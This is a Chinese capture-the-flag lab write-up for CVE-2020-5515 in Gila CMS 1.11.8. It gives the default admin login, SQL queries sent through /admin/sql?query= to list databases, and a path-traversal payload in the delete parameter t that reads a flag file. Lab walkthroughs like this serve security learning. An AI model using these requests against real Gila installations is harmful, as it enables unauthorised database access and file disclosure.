春秋云镜 CVE-2020-5515

春秋云镜 CVE-2020-5515 Gila CMS 1.11.8 sql注入

靶标介绍

Gila CMS是一套基于PHP和MySQL的开源内容管理系统(CMS)。
Gila CMS 1.11.8版本中的/admin/sql?query=存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。

启动场景

在这里插入图片描述

漏洞利用

/admin进入后台管理界面,admin@admincom/admin
在这里插入图片描述
请求/admin/sql
http://eci-2ze16snbrsmbebha16x7.cloudeci1.ichunqiu.com/admin/sql
在这里插入图片描述
“Show Tables”http://eci-2ze16snbrsmbebha16x7.cloudeci1.ichunqiu.com/admin/sql?query=SHOW%20TABLES
在这里插入图片描述
参数query存在注入(内联查询)
http://eci-2ze16snbrsmbebha16x7.cloudeci1.ichunqiu.com/admin/sql?query=SELECT%20VERSION(),USER()
在这里插入图片描述
获取当前数据库
http://eci-2ze16snbrsmbebha16x7.cloudeci1.ichunqiu.com/admin/sql?query=SELECT%20database(),USER()
在这里插入图片描述
获取所有数据库
http://eci-2ze16snbrsmbebha16x7.cloudeci1.ichunqiu.com/admin/sql?query=SELECT%20database(),(select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA)
在这里插入图片描述
未找到flag,尝试GilaCMS 1.11.8 – ‘/cm/delete?t=’ LFI(本地文件包含)
http://eci-2ze16snbrsmbebha16x7.cloudeci1.ichunqiu.com/admin/content/post
在这里插入图片描述
burp抓包,删除任意帖子,将参数t的值更改为“…/…/…/…/…/…/…/…/flag
在这里插入图片描述

在这里插入图片描述
得到flag

flag{1339008e-e847-4a9b-9161-d04941e80be6}

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值